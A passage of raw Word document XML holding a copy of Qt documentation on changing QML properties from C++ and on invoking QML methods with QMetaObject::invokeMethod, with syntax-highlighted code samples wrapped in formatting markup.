          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;&lt;</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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r w:rsidR="00CA76F2" w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00CA76F2" w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r w:rsidR="00CA76F2" w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00CA76F2" w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"someNumber"</w:t>
      </w:r>
      <w:r w:rsidR="00CA76F2" w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="00CA76F2" w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>toInt</w:t>
      </w:r>
      <w:r w:rsidR="00CA76F2"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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>setProperty</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"someNumber"</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100</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064AC7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>You should always use</w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2929" w:anchor="setProperty" w:history="1">
        <w:r w:rsidRPr="00064AC7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject::setProperty</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(),</w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2930" w:history="1">
        <w:r w:rsidRPr="00064AC7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlProperty</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2931" w:anchor="write" w:history="1">
        <w:r w:rsidRPr="00064AC7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QMetaProperty::write</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() to change a QML property value, to ensure the QML engine is made aware of the property change</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. For </w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, say you have a custom type</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PushButton</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>with a</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buttonText</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property that internally reflects the value of a</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m_buttonText</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">member variable. Modifying the member variable directly like this is </w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>not a good idea</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//bad code</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QQmlComponent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> component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engine</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"MyButton.qml"</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PushButton</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button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qobject_cast</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PushButton</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>*&gt;(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>component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create</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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>button</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">m_buttonText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"Click me"</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CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Since the value is changed directly, </w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>this bypasses Qt's</w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2932" w:history="1">
        <w:r w:rsidRPr="00064AC7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>meta-object system</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and the QML engine is not made aware of the property change</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. This mea</w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ns property bindings to</w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>buttonText</w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>would not be updated, and any</w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>onButtonTextChanged</w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>handlers would not be called</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00064AC7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> // qml realization //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA76F2" w:rsidRPr="00CA76F2" w:rsidRDefault="00CA76F2" w:rsidP="001945D5">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2640" w:name="invoking-qml-methods"/>
      <w:bookmarkStart w:id="2641" w:name="_Toc483001108"/>
      <w:bookmarkStart w:id="2642" w:name="_Toc483004077"/>
      <w:bookmarkStart w:id="2643" w:name="_Toc483604441"/>
      <w:bookmarkStart w:id="2644" w:name="_Toc483605661"/>
      <w:bookmarkEnd w:id="2640"/>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Invoking QML Methods</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2641"/>
      <w:bookmarkEnd w:id="2642"/>
      <w:bookmarkEnd w:id="2643"/>
      <w:bookmarkEnd w:id="2644"/>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CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>All QML methods are exposed to the meta-object system and can be called from C++ using</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2933" w:anchor="invokeMethod" w:history="1">
        <w:r w:rsidRPr="00064AC7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QMetaObject::invokeMethod</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>().</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Method parameters and return values passed from QML are always translated into</w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2934" w:history="1">
        <w:r w:rsidRPr="00064AC7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QVariant</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>values in C++.</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CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Here is a C++ application that calls a QML method using</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2935" w:anchor="invokeMethod" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QMetaObject::invokeMethod</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9800"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63"/>
        <w:gridCol w:w="7937"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CA76F2" w:rsidRPr="00CA76F2" w:rsidTr="00064AC7">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A76F2" w:rsidRPr="00CA76F2" w:rsidRDefault="00CA76F2" w:rsidP="00CA76F2">
            <w:pPr>
              <w:spacing w:after="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>QML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7937"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com"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="55FFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>// MyItem.qml</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import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QtQuick</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2.0</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Item</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lang w:val="en-US"/>
              </w:rPr>
              <w:t>function</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> myQmlFunction</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msg</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console</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log</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
